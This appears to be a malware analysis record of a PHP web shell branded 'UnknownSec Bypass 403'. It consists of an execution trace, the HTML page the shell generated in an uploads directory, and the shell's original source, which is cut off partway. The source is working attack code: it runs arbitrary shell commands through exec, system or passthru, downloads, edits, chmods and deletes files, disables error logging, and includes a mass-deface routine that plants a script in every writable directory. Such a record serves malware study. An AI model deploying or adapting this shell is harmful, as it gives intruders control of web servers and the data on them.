2 15 0 0.002299 532736 p 1 /var/www/html/uploads/user.php 161 1 '/var/www/html/uploads'
3 16 0 0.002318 532736 fileperms 0 /var/www/html/uploads/user.php 88 1 '/var/www/html/uploads'
3 16 1 0.002344 532800
3 16 R 16895
2 A /var/www/html/uploads/user.php 88 $p = 16895
2 A /var/www/html/uploads/user.php 98 $i = 'd'
2 A /var/www/html/uploads/user.php 106 $i .= 'r'
2 A /var/www/html/uploads/user.php 107 $i .= 'w'
2 A /var/www/html/uploads/user.php 110 $i .= 'x'
2 A /var/www/html/uploads/user.php 111 $i .= 'r'
2 A /var/www/html/uploads/user.php 112 $i .= 'w'
2 A /var/www/html/uploads/user.php 115 $i .= 'x'
2 A /var/www/html/uploads/user.php 116 $i .= 'r'
2 A /var/www/html/uploads/user.php 117 $i .= 'w'
2 A /var/www/html/uploads/user.php 120 $i .= 'x'
2 15 1 0.002542 532800
2 15 R 'drwxrwxrwx'
2 17 0 0.002564 532800 ▟ 1 /var/www/html/uploads/user.php 161 2 '/var/www/html/uploads' 'drwxrwxrwx'
3 18 0 0.002584 532800 getcwd 0 /var/www/html/uploads/user.php 31 0
3 18 1 0.002604 532848
3 18 R '/var/www/html/uploads'
2 A /var/www/html/uploads/user.php 31 $▚ = '/var/www/html/uploads'
3 19 0 0.002643 532848 is_writable 0 /var/www/html/uploads/user.php 33 1 '/var/www/html/uploads'
3 19 1 0.002669 532888
3 19 R TRUE
2 17 1 0.002690 532864
2 17 R '<font color=\'green\'>drwxrwxrwx</font>'
2 20 0 0.002719 532760 getcwd 0 /var/www/html/uploads/user.php 181 0
2 20 1 0.002751 532808
2 20 R '/var/www/html/uploads'
1 A /var/www/html/uploads/user.php 181 $dir = '/var/www/html/uploads'
2 21 0 0.002791 532808 str_replace 0 /var/www/html/uploads/user.php 183 3 '\\' '/' '/var/www/html/uploads'
2 21 1 0.002813 532904
2 21 R '/var/www/html/uploads'
1 A /var/www/html/uploads/user.php 183 $dir = '/var/www/html/uploads'
2 22 0 0.002850 532808 explode 0 /var/www/html/uploads/user.php 184 2 '/' '/var/www/html/uploads'
2 22 1 0.002872 533384
2 22 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/user.php 184 $scdir = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/user.php 185 $i = 0
1 A /var/www/html/uploads/user.php 185 $i++
2 23 0 0.002962 533312 scandir 0 /var/www/html/uploads/user.php 591 1 '/var/www/html/uploads'
2 23 1 0.003009 533936
2 23 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'user.php']
1 A /var/www/html/uploads/user.php 591 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'user.php']
2 24 0 0.003065 533904 getcwd 0 /var/www/html/uploads/user.php 592 0
2 24 1 0.003096 533952
2 24 R '/var/www/html/uploads'
1 A /var/www/html/uploads/user.php 592 $pa = '/var/www/html/uploads'
2 25 0 0.003137 533952 filemtime 0 /var/www/html/uploads/user.php 604 1 '/var/www/html/uploads/.'
2 25 1 0.003161 533992
2 25 R 1676244754
2 26 0 0.003182 533904 date 0 /var/www/html/uploads/user.php 604 2 'Y-m-d g:i:s' 1676244754
2 26 1 0.003266 536296
2 26 R '2023-02-12 6:32:34'
1 A /var/www/html/uploads/user.php 604 $dt = '2023-02-12 6:32:34'
2 27 0 0.003310 536272 is_dir 0 /var/www/html/uploads/user.php 605 1 '/var/www/html/uploads/.'
2 27 1 0.003330 536312
2 27 R TRUE
2 28 0 0.003352 536280 filemtime 0 /var/www/html/uploads/user.php 604 1 '/var/www/html/uploads/..'
2 28 1 0.003376 536328
2 28 R 1676244754
2 29 0 0.003397 536232 date 0 /var/www/html/uploads/user.php 604 2 'Y-m-d g:i:s' 1676244754
2 29 1 0.003443 536560
2 29 R '2023-02-12 6:32:34'
1 A /var/www/html/uploads/user.php 604 $dt = '2023-02-12 6:32:34'
2 30 0 0.003481 536288 is_dir 0 /var/www/html/uploads/user.php 605 1 '/var/www/html/uploads/..'
2 30 1 0.003500 536328
2 30 R TRUE
2 31 0 0.003521 536288 filemtime 0 /var/www/html/uploads/user.php 604 1 '/var/www/html/uploads/.htaccess'
2 31 1 0.003544 536328
2 31 R 1676244754
2 32 0 0.003564 536232 date 0 /var/www/html/uploads/user.php 604 2 'Y-m-d g:i:s' 1676244754
2 32 1 0.003609 536560
2 32 R '2023-02-12 6:32:34'
1 A /var/www/html/uploads/user.php 604 $dt = '2023-02-12 6:32:34'
2 33 0 0.003647 536288 is_dir 0 /var/www/html/uploads/user.php 605 1 '/var/www/html/uploads/.htaccess'
2 33 1 0.003667 536328
2 33 R FALSE
2 34 0 0.003688 536288 filemtime 0 /var/www/html/uploads/user.php 604 1 '/var/www/html/uploads/data'
2 34 1 0.003711 536328
2 34 R 1676244754
2 35 0 0.003731 536232 date 0 /var/www/html/uploads/user.php 604 2 'Y-m-d g:i:s' 1676244754
2 35 1 0.003775 536560
2 35 R '2023-02-12 6:32:34'
1 A /var/www/html/uploads/user.php 604 $dt = '2023-02-12 6:32:34'
2 36 0 0.003813 536288 is_dir 0 /var/www/html/uploads/user.php 605 1 '/var/www/html/uploads/data'
2 36 1 0.003832 536328
2 36 R TRUE
2 37 0 0.003854 536288 is_writable 0 /var/www/html/uploads/user.php 612 1 '/var/www/html/uploads/data'
2 37 1 0.003879 536328
2 37 R TRUE
2 38 0 0.003910 536288 p 1 /var/www/html/uploads/user.php 614 1 '/var/www/html/uploads/data'
3 39 0 0.003930 536288 fileperms 0 /var/www/html/uploads/user.php 88 1 '/var/www/html/uploads/data'
3 39 1 0.003949 536328
3 39 R 16895
2 A /var/www/html/uploads/user.php 88 $p = 16895
2 A /var/www/html/uploads/user.php 98 $i = 'd'
2 A /var/www/html/uploads/user.php 106 $i .= 'r'
2 A /var/www/html/uploads/user.php 107 $i .= 'w'
2 A /var/www/html/uploads/user.php 110 $i .= 'x'
2 A /var/www/html/uploads/user.php 111 $i .= 'r'
2 A /var/www/html/uploads/user.php 112 $i .= 'w'
2 A /var/www/html/uploads/user.php 115 $i .= 'x'
2 A /var/www/html/uploads/user.php 116 $i .= 'r'
2 A /var/www/html/uploads/user.php 117 $i .= 'w'
2 A /var/www/html/uploads/user.php 120 $i .= 'x'
2 38 1 0.004136 536328
2 38 R 'drwxrwxrwx'
2 40 0 0.004158 536288 is_writable 0 /var/www/html/uploads/user.php 615 1 '/var/www/html/uploads/data'
2 40 1 0.004183 536328
2 40 R TRUE
2 41 0 0.004205 536296 filemtime 0 /var/www/html/uploads/user.php 604 1 '/var/www/html/uploads/prepend.php'
2 41 1 0.004229 536344
2 41 R 1676244754
2 42 0 0.004250 536240 date 0 /var/www/html/uploads/user.php 604 2 'Y-m-d g:i:s' 1676244754
2 42 1 0.004295 536568
2 42 R '2023-02-12 6:32:34'
1 A /var/www/html/uploads/user.php 604 $dt = '2023-02-12 6:32:34'
2 43 0 0.004334 536304 is_dir 0 /var/www/html/uploads/user.php 605 1 '/var/www/html/uploads/prepend.php'
2 43 1 0.004354 536344
2 43 R FALSE
2 44 0 0.004375 536296 filemtime 0 /var/www/html/uploads/user.php 604 1 '/var/www/html/uploads/user.php'
2 44 1 0.004398 536328
2 44 R 1676244754
2 45 0 0.004418 536232 date 0 /var/www/html/uploads/user.php 604 2 'Y-m-d g:i:s' 1676244754
2 45 1 0.004463 536560
2 45 R '2023-02-12 6:32:34'
1 A /var/www/html/uploads/user.php 604 $dt = '2023-02-12 6:32:34'
2 46 0 0.004501 536288 is_dir 0 /var/www/html/uploads/user.php 605 1 '/var/www/html/uploads/user.php'
2 46 1 0.004521 536328
2 46 R FALSE
2 47 0 0.004542 536280 filemtime 0 /var/www/html/uploads/user.php 638 1 '/var/www/html/uploads/.'
2 47 1 0.004564 536312
2 47 R 1676244754
2 48 0 0.004584 536224 date 0 /var/www/html/uploads/user.php 638 2 'Y-m-d g:i:s' 1676244754
2 48 1 0.004628 536552
2 48 R '2023-02-12 6:32:34'
1 A /var/www/html/uploads/user.php 638 $ft = '2023-02-12 6:32:34'
2 49 0 0.004667 536528 is_file 0 /var/www/html/uploads/user.php 639 1 '/var/www/html/uploads/.'
2 49 1 0.004688 536568
2 49 R FALSE
2 50 0 0.004709 536536 filemtime 0 /var/www/html/uploads/user.php 638 1 '/var/www/html/uploads/..'
2 50 1 0.004731 536584
2 50 R 1676244754
2 51 0 0.004751 536488 date 0 /var/www/html/uploads/user.php 638 2 'Y-m-d g:i:s' 1676244754
2 51 1 0.004796 536816
2 51 R '2023-02-12 6:32:34'
1 A /var/www/html/uploads/user.php 638 $ft = '2023-02-12 6:32:34'
2 52 0 0.004835 536544 is_file 0 /var/www/html/uploads/user.php 639 1 '/var/www/html/uploads/..'
2 52 1 0.004855 536584
2 52 R FALSE
2 53 0 0.004876 536544 filemtime 0 /var/www/html/uploads/user.php 638 1 '/var/www/html/uploads/.htaccess'
2 53 1 0.004899 536584
2 53 R 1676244754
2 54 0 0.004920 536488 date 0 /var/www/html/uploads/user.php 638 2 'Y-m-d g:i:s' 1676244754
2 54 1 0.004965 536816
2 54 R '2023-02-12 6:32:34'
1 A /var/www/html/uploads/user.php 638 $ft = '2023-02-12 6:32:34'
2 55 0 0.005003 536544 is_file 0 /var/www/html/uploads/user.php 639 1 '/var/www/html/uploads/.htaccess'
2 55 1 0.005023 536584
2 55 R TRUE
2 56 0 0.005044 536544 filesize 0 /var/www/html/uploads/user.php 640 1 '/var/www/html/uploads/.htaccess'
2 56 1 0.005064 536584
2 56 R 64
1 A /var/www/html/uploads/user.php 640 $s = 0.0625
2 57 0 0.005101 536488 round 0 /var/www/html/uploads/user.php 641 2 0.0625 3
2 57 1 0.005122 536560
2 57 R 0.063
1 A /var/www/html/uploads/user.php 641 $s = 0.063
1 A /var/www/html/uploads/user.php 645 $s = '0.063 KB'
2 58 0 0.005177 536528 pathinfo 0 /var/www/html/uploads/user.php 650 2 '.htaccess' 4
2 58 1 0.005207 536632
2 58 R 'htaccess'
2 59 0 0.005229 536568 strtolower 0 /var/www/html/uploads/user.php 650 1 'htaccess'
2 59 1 0.005248 536600
2 59 R 'htaccess'
1 A /var/www/html/uploads/user.php 650 $▖ = 'htaccess'
2 60 0 0.005287 536624 is_writable 0 /var/www/html/uploads/user.php 709 1 '/var/www/html/uploads/.htaccess'
2 60 1 0.005313 536664
2 60 R FALSE
2 61 0 0.005333 536624 is_readable 0 /var/www/html/uploads/user.php 710 1 '/var/www/html/uploads/.htaccess'
2 61 1 0.005356 536664
2 61 R TRUE
2 62 0 0.005377 536624 p 1 /var/www/html/uploads/user.php 711 1 '/var/www/html/uploads/.htaccess'
3 63 0 0.005397 536624 fileperms 0 /var/www/html/uploads/user.php 88 1 '/var/www/html/uploads/.htaccess'
3 63 1 0.005416 536664
3 63 R 33188
2 A /var/www/html/uploads/user.php 88 $p = 33188
2 A /var/www/html/uploads/user.php 94 $i = '-'
2 A /var/www/html/uploads/user.php 106 $i .= 'r'
2 A /var/www/html/uploads/user.php 107 $i .= 'w'
2 A /var/www/html/uploads/user.php 110 $i .= '-'
2 A /var/www/html/uploads/user.php 111 $i .= 'r'
2 A /var/www/html/uploads/user.php 112 $i .= '-'
2 A /var/www/html/uploads/user.php 115 $i .= '-'
2 A /var/www/html/uploads/user.php 116 $i .= 'r'
2 A /var/www/html/uploads/user.php 117 $i .= '-'
2 A /var/www/html/uploads/user.php 120 $i .= '-'
2 62 1 0.005639 536664
2 62 R '-rw-r--r--'
2 64 0 0.005662 536624 is_writable 0 /var/www/html/uploads/user.php 712 1 '/var/www/html/uploads/.htaccess'
2 64 1 0.005687 536664
2 64 R FALSE
2 65 0 0.005709 536624 is_readable 0 /var/www/html/uploads/user.php 712 1 '/var/www/html/uploads/.htaccess'
2 65 1 0.005733 536664
2 65 R TRUE
2 66 0 0.005765 536736 filemtime 0 /var/www/html/uploads/user.php 638 1 '/var/www/html/uploads/data'
2 66 1 0.005789 536776
2 66 R 1676244754
2 67 0 0.005810 536680 date 0 /var/www/html/uploads/user.php 638 2 'Y-m-d g:i:s' 1676244754
2 67 1 0.005856 537008
2 67 R '2023-02-12 6:32:34'
1 A /var/www/html/uploads/user.php 638 $ft = '2023-02-12 6:32:34'
2 68 0 0.005896 536736 is_file 0 /var/www/html/uploads/user.php 639 1 '/var/www/html/uploads/data'
2 68 1 0.005917 536776
2 68 R FALSE
2 69 0 0.005938 536744 filemtime 0 /var/www/html/uploads/user.php 638 1 '/var/www/html/uploads/prepend.php'
2 69 1 0.005962 536792
2 69 R 1676244754
2 70 0 0.005983 536688 date 0 /var/www/html/uploads/user.php 638 2 'Y-m-d g:i:s' 1676244754
2 70 1 0.006028 537016
2 70 R '2023-02-12 6:32:34'
1 A /var/www/html/uploads/user.php 638 $ft = '2023-02-12 6:32:34'
2 71 0 0.006067 536752 is_file 0 /var/www/html/uploads/user.php 639 1 '/var/www/html/uploads/prepend.php'
2 71 1 0.006088 536792
2 71 R TRUE
2 72 0 0.006108 536752 filesize 0 /var/www/html/uploads/user.php 640 1 '/var/www/html/uploads/prepend.php'
2 72 1 0.006129 536792
2 72 R 57
1 A /var/www/html/uploads/user.php 640 $s = 0.0556640625
2 73 0 0.006166 536648 round 0 /var/www/html/uploads/user.php 641 2 0.0556640625 3
2 73 1 0.006186 536720
2 73 R 0.056
1 A /var/www/html/uploads/user.php 641 $s = 0.056
1 A /var/www/html/uploads/user.php 645 $s = '0.056 KB'
2 74 0 0.006240 536688 pathinfo 0 /var/www/html/uploads/user.php 650 2 'prepend.php' 4
2 74 1 0.006262 536784
2 74 R 'php'
2 75 0 0.006283 536720 strtolower 0 /var/www/html/uploads/user.php 650 1 'php'
2 75 1 0.006302 536752
2 75 R 'php'
1 A /var/www/html/uploads/user.php 650 $▖ = 'php'
2 76 0 0.006340 536744 is_writable 0 /var/www/html/uploads/user.php 709 1 '/var/www/html/uploads/prepend.php'
2 76 1 0.006364 536784
2 76 R FALSE
2 77 0 0.006385 536744 is_readable 0 /var/www/html/uploads/user.php 710 1 '/var/www/html/uploads/prepend.php'
2 77 1 0.006409 536784
2 77 R TRUE
2 78 0 0.006430 536744 p 1 /var/www/html/uploads/user.php 711 1 '/var/www/html/uploads/prepend.php'
3 79 0 0.006450 536744 fileperms 0 /var/www/html/uploads/user.php 88 1 '/var/www/html/uploads/prepend.php'
3 79 1 0.006470 536784
3 79 R 33261
2 A /var/www/html/uploads/user.php 88 $p = 33261
2 A /var/www/html/uploads/user.php 94 $i = '-'
2 A /var/www/html/uploads/user.php 106 $i .= 'r'
2 A /var/www/html/uploads/user.php 107 $i .= 'w'
2 A /var/www/html/uploads/user.php 110 $i .= 'x'
2 A /var/www/html/uploads/user.php 111 $i .= 'r'
2 A /var/www/html/uploads/user.php 112 $i .= '-'
2 A /var/www/html/uploads/user.php 115 $i .= 'x'
2 A /var/www/html/uploads/user.php 116 $i .= 'r'
2 A /var/www/html/uploads/user.php 117 $i .= '-'
2 A /var/www/html/uploads/user.php 120 $i .= 'x'
2 78 1 0.006718 536784
2 78 R '-rwxr-xr-x'
2 80 0 0.006741 536744 is_writable 0 /var/www/html/uploads/user.php 712 1 '/var/www/html/uploads/prepend.php'
2 80 1 0.006768 536784
2 80 R FALSE
2 81 0 0.006789 536744 is_readable 0 /var/www/html/uploads/user.php 712 1 '/var/www/html/uploads/prepend.php'
2 81 1 0.006813 536784
2 81 R TRUE
2 82 0 0.006836 536736 filemtime 0 /var/www/html/uploads/user.php 638 1 '/var/www/html/uploads/user.php'
2 82 1 0.006858 536768
2 82 R 1676244754
2 83 0 0.006879 536672 date 0 /var/www/html/uploads/user.php 638 2 'Y-m-d g:i:s' 1676244754
2 83 1 0.006926 537000
2 83 R '2023-02-12 6:32:34'
1 A /var/www/html/uploads/user.php 638 $ft = '2023-02-12 6:32:34'
2 84 0 0.006966 536728 is_file 0 /var/www/html/uploads/user.php 639 1 '/var/www/html/uploads/user.php'
2 84 1 0.006985 536768
2 84 R TRUE
2 85 0 0.007006 536728 filesize 0 /var/www/html/uploads/user.php 640 1 '/var/www/html/uploads/user.php'
2 85 1 0.007026 536768
2 85 R 24291
1 A /var/www/html/uploads/user.php 640 $s = 23.7216796875
2 86 0 0.007063 536632 round 0 /var/www/html/uploads/user.php 641 2 23.7216796875 3
2 86 1 0.007092 536704
2 86 R 23.722
1 A /var/www/html/uploads/user.php 641 $s = 23.722
1 A /var/www/html/uploads/user.php 645 $s = '23.722 KB'
2 87 0 0.007148 536672 pathinfo 0 /var/www/html/uploads/user.php 650 2 'user.php' 4
2 87 1 0.007171 536768
2 87 R 'php'
2 88 0 0.007191 536704 strtolower 0 /var/www/html/uploads/user.php 650 1 'php'
2 88 1 0.007211 536736
2 88 R 'php'
1 A /var/www/html/uploads/user.php 650 $▖ = 'php'
2 89 0 0.007249 536728 is_writable 0 /var/www/html/uploads/user.php 709 1 '/var/www/html/uploads/user.php'
2 89 1 0.007274 536768
2 89 R FALSE
2 90 0 0.007295 536728 is_readable 0 /var/www/html/uploads/user.php 710 1 '/var/www/html/uploads/user.php'
2 90 1 0.007317 536768
2 90 R TRUE
2 91 0 0.007338 536728 p 1 /var/www/html/uploads/user.php 711 1 '/var/www/html/uploads/user.php'
3 92 0 0.007355 536728 fileperms 0 /var/www/html/uploads/user.php 88 1 '/var/www/html/uploads/user.php'
3 92 1 0.007375 536768
3 92 R 33204
2 A /var/www/html/uploads/user.php 88 $p = 33204
2 A /var/www/html/uploads/user.php 94 $i = '-'
2 A /var/www/html/uploads/user.php 106 $i .= 'r'
2 A /var/www/html/uploads/user.php 107 $i .= 'w'
2 A /var/www/html/uploads/user.php 110 $i .= '-'
2 A /var/www/html/uploads/user.php 111 $i .= 'r'
2 A /var/www/html/uploads/user.php 112 $i .= 'w'
2 A /var/www/html/uploads/user.php 115 $i .= '-'
2 A /var/www/html/uploads/user.php 116 $i .= 'r'
2 A /var/www/html/uploads/user.php 117 $i .= '-'
2 A /var/www/html/uploads/user.php 120 $i .= '-'
2 91 1 0.007560 536768
2 91 R '-rw-rw-r--'
2 93 0 0.007582 536728 is_writable 0 /var/www/html/uploads/user.php 712 1 '/var/www/html/uploads/user.php'
2 93 1 0.007606 536768
2 93 R FALSE
2 94 0 0.007626 536728 is_readable 0 /var/www/html/uploads/user.php 712 1 '/var/www/html/uploads/user.php'
2 94 1 0.007649 536768
2 94 R TRUE
2 95 0 0.007671 536672 date 0 /var/www/html/uploads/user.php 741 1 'Y'
2 95 1 0.007760 536960
2 95 R '2023'
1 3 1 0.007789 536672
0.007852 361816
TRACE END [2023-02-12 21:33:00.146012]
Generated HTML code
<html><head>
<meta name="author" content="UnknownSec">
<meta name="robots" content="NOINDEX, NOFOLLOW">
<title>localhost - UnknownSec 403</title>
<meta name="viewport" content="width=device-width, initial-scale=0.60, user-scalable=no">
<link rel="stylesheet" href="//unknownsec1337.github.io/main/style_2.css">
</head>
<body>
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js"></script>
<div class="card text-dark">
<div class="card-header">
<a href="/user.php"><h4>UnknownSec Bypass <i class="fas fa-biohazard"></i> <img alt="Bypass 403" src="//icons.getbootstrap.com/assets/icons/activity.svg" width="25px"> 403</h4></a><i class="bi bi-hdd-rack"></i> : <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/ [ <font color="green">drwxrwxrwx</font> ]
<div class="dropdown">
<button class="btn btn-dark dropdown-toggle" type="button" id="dropdownMenuButton" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><i class="bi bi-menu-down"></i> Menu</button>
<div class="dropdown-menu">
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=upload"><i class="bi bi-upload"></i> Upload</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=depes"><i class="bi bi-exclamation-diamond"></i> Mass depes</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=delete"><i class="bi bi-trash"></i> Mass delete</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=cmd"><i class="bi bi-terminal"></i> Terminal</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=info"><i class="bi bi-info-circle"></i> Info server</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=about"><i class="bi bi-info"></i> About</a>
</div>
</div>
</div>
</div><br><center></center><div class="container-fluid"><table class="table table-striped table-bordered table-hover bg-white" cellspacing="0" cellpadding="7" width="100%">
<tbody><tr>
<th class="text-center bg-dark text-white">Name</th>
<th class="text-center bg-dark text-white">Last edit</th>
<th class="text-center bg-dark text-white">Size</th>
<th class="text-center bg-dark text-white">Permission</th>
<th class="text-center bg-dark text-white">Options</th>
</tr>
<tr>
</tr><tr>
<td><img alt="file" src="//unknownsec1337.github.io/icon/dflt.png" class="ico"><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td>
<td><center>2023-02-12 6:32:27</center></td>
<td><center>0 KB</center></td>
<td><center>-rw-r--r--</center></td>
<td>
<form method="POST" action="?option&path=/var/www/html">
<div class="input-group mb-3 text-center">
<select class="form-control" style="width: 40%;" name="opt">
<option selected="" disabled="">Select</option>
<option value="delete">Delete</option>
<option value="edit">Edit</option>
<option value="rename">Rename</option>
<option value="chmod">Chmod</option>
<option value="download">Download</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<div class="input-group-append">
<input class="btn btn-primary btn-block" type="submit" value="Go">
</div>
</div></form>
</td>
</tr>
<tr>
<td><img alt="file" src="//unknownsec1337.github.io/icon/php.png" class="ico"><a href="?filesrc=/var/www/html/user.php&path=/var/www/html">user.php</a></td>
<td><center>2023-02-12 6:32:27</center></td>
<td><center>23.722 KB</center></td>
<td><center>-rw-rw-r--</center></td>
<td>
<form method="POST" action="?option&path=/var/www/html">
<div class="input-group mb-3 text-center">
<select class="form-control" style="width: 40%;" name="opt">
<option selected="" disabled="">Select</option>
<option value="delete">Delete</option>
<option value="edit">Edit</option>
<option value="rename">Rename</option>
<option value="chmod">Chmod</option>
<option value="download">Download</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="user.php">
<input type="hidden" name="path" value="/var/www/html/user.php">
<div class="input-group-append">
<input class="btn btn-primary btn-block" type="submit" value="Go">
</div>
</div></form>
</td>
</tr>
</tbody></table>
<div class="card text-dark">
<div class="card-header text-center">
<kbd>Copyright © 2023 - <a href="">UnknownSec</a></kbd>
</div>
</div>
<script src="//code.jquery.com/jquery-3.3.1.slim.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
<script src="//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
</div></body></html>Original PHP code
<?php
/* ~ Gw doain kalo lu recode tytyd lu jadi kecil
~ v.02
~ Special thanks to Michy Amrane
~ Untuk beberapa tools gw ambil dari indoxploit, karena tidak semuanya gw otakin sendiri.
*/
set_time_limit(0);
error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$▛ = 'UnknownSec';
$▘ = "<style>table{display:none;}</style>";
if(isset($_GET['option']) && $_POST['opt'] == 'download'){
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="'.$_POST['name'].'"');
echo(file_get_contents($_POST['path']));
exit();
}
if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
function ▟($dir,$p) {
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>".$p."</font>";
} else {
return "<font color='red'>".$p."</font>";
}
}
function dc($dir,$p) {
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>".$p."</font>";
} else {
return "<font color='red'>".$p."</font>";
}
}
function ip() {
$ipas = '';
if (getenv('HTTP_CLIENT_IP'))
$ipas = getenv('HTTP_CLIENT_IP');
else if(getenv('HTTP_X_FORWARDED_FOR'))
$ipas = getenv('HTTP_X_FORWARDED_FOR');
else if(getenv('HTTP_X_FORWARDED'))
$ipas = getenv('HTTP_X_FORWARDED');
else if(getenv('HTTP_FORWARDED_FOR'))
$ipas = getenv('HTTP_FORWARDED_FOR');
else if(getenv('HTTP_FORWARDED'))
$ipas = getenv('HTTP_FORWARDED');
else if(getenv('REMOTE_ADDR'))
$ipas = getenv('REMOTE_ADDR');
else
$ipas = 'IP tidak dikenali';
return $ipas;
}
function x($cmd) {
$▙ = '';
if(function_exists('exec')) {
@exec($cmd,$▙);
$▙ = @join("\n",$▙);
}elseif (function_exists('passthru')) {
ob_start();
@passthru($cmd);
$▙ = ob_get_clean();
}elseif (function_exists('system')) {
ob_start();
@system($cmd);
$▙ = ob_get_clean();
}elseif (function_exists('shell_exec')) {
$▙ = shell_exec($cmd);
}else return "↳ Unable to execute command\n";
return ($▙==''?"↳ Query did not return anything\n":$▙);
}
function p($file){
$p = fileperms($file);
if (($p & 0xC000) == 0xC000) {
$i = 's';
} elseif (($p & 0xA000) == 0xA000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ?
(($p & 0x0800) ? 's' : 'x' ) :
(($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ?
(($p & 0x0400) ? 's' : 'x' ) :
(($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ?
(($p & 0x0200) ? 't' : 'x' ) :
(($p & 0x0200) ? 'T' : '-'));
return $i;
exit();
}
echo "
<!DOCTYPE HTML>
<html>
<head>
<meta name='author' content='$▛'>
<meta name='robots' content='NOINDEX, NOFOLLOW'>
<title>".$_SERVER['HTTP_HOST']." - $▛ 403</title>
<meta name='viewport' content='width=device-width, initial-scale=0.60, user-scalable=no'>
<link rel='stylesheet' href='//unknownsec1337.github.io/main/style_2.css'>
</head>
<body>
<script src='//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>
<script src='//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js'></script>
<div class='card text-dark'>
<div class='card-header'>
<a href='".$_SERVER['PHP_SELF']."'><h4>$▛ Bypass <i class='fas fa-biohazard'></i> <img alt='Bypass 403' src='//icons.getbootstrap.com/assets/icons/activity.svg' width='25px'> 403</h4></a>";
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<i class="bi bi-hdd-rack"></i> : <a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo " [ ".▟($path, p($path))." ]";
echo "
<div class='dropdown'>
<button class='btn btn-dark dropdown-toggle' type='button' id='dropdownMenuButton' data-toggle='dropdown' aria-haspopup='true' aria-expanded='false'><i class='bi bi-menu-down'></i> Menu</button>
<div class='dropdown-menu'>
<a class='dropdown-item' href='?path=$path&dir=$path&id=upload'><i class='bi bi-upload'></i> Upload</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=depes'><i class='bi bi-exclamation-diamond'></i> Mass depes</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=delete'><i class='bi bi-trash'></i> Mass delete</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=cmd'><i class='bi bi-terminal'></i> Terminal</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=info'><i class='bi bi-info-circle'></i> Info server</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=about'><i class='bi bi-info'></i> About</a></h5>
</div>
</div>
</div>
</div>";
// tools nya
if(isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\","/",$dir);
$scdir = explode("/", $dir);
for($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if($i != $c_dir) {
}
elseif($_GET['id'] == 'depes'){
function mass_kabeh($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
